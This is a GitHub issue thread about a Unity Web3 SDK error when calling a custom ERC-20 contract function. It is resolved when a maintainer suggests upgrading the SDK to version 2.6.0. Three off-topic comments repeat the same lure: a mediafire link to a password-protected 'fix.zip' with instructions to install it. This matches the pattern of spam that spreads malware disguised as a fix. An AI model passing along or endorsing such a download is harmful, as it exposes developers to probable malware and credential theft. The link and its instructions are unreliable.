### ISSUE TITLE
Can't use any custom function of my Smart Contract

### ISSUE THREAD

**Issue by OmeGaCinoS** [ChainSafe/web3.unity#1112]
**Summary**
I got an error with all my custom function in my Smart Contract (ERC-20)  when I'm calling them : 

Builds.framework.js.gz:10 Web3Exception: RPC returned error for "eth_call": -32000 execution reverted 
  at ChainSafe.Gaming.Evm.Providers.RpcClientProvider.Perform[T] (System.String method, System.Object[] parameters) [0x00000] in <00000000000000000000000000000000>:0 
Rethrow as Web3Exception: eth_call: bad result from RPC endpoint
  at ChainSafe.Gaming.Evm.Providers.RpcClientProvider.Perform[T] (System.String method, System.Object[] parameters) [0x00000] in <00000000000000000000000000000000>:0 

Here is the function that I'm trying to call : 

// Function to check if a player has enough tokens to join the game
function checkBalance(address account, uint256 minBalance) public view returns (bool) 
{
        return balanceOf(account) >= minBalance;
 }

If I selected here my function "checkBalance" I got the error, but If I'm checking directly with the function "balanceOf" it's working! 
So I can call function of the SC, but basic one, and when I call everything else that is not "basic" I got that kind of error! 

 (ABI referenced and function existing and working, everything work on Remix.ethereum)
**Suggested features or ways to address the summary**
[A clear and concise description of any potential solutions or features you've considered that might help solve the need/problem above.]

I discuss about the issue on the ChainSafe discord with Sneakz here : https://discord.com/channels/593655374469660673/1275949322848043069

He told me to send my SC here to see why I can use any custom functions! (attach to this post)
[SC_Show.txt](https://github.com/user-attachments/files/16749988/SC_Show.txt)

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kantagara** [comment]
Hey thank you for opening this issue. Will try to repro it asap.

**Comment by kantagara** [comment]
Hey I have tested it with the following code:
`var contract = Web3Accessor.Web3.ContractBuilder.Build( abi, "0x7164F96b67f6cB63DeD75710c86fC3c6490356Ef");
        var res = await contract.Call("checkBalance", new object[]
        {
            Web3Accessor.Web3.Signer.PublicAddress,
            new BigInteger(10)
        });
        Debug.Log(res[0]);

`

where abi is the abi from your contract. and I am getting back an output (either true or false)

**Comment by OmeGaCinoS** [comment]
Hi @kantagara thanks for the answer! 

I tried the same code you gave me, and it's not working... Except that I can't get the Public Address like that? Maybe I got the wrong version of the SDK?

![image](https://github.com/user-attachments/assets/68e1de97-41d2-4c0a-b507-f3e411f780ec)
Still getting the same error even with your SmartContract Address

**Comment by kantagara** [comment]
Hey do you know what SDK version are you using? I'd advise you to update your SDK version to the latest one (2.6.0)

**Comment by OmeGaCinoS** [comment]
It was very old because it was the only one I could install! I am working on installing the 2.6 version! I'm currently remaking the flow to call What I Want!

**Comment by OmeGaCinoS** [comment]
Yes you can everything is working now! Thanks a lot @kantagara !
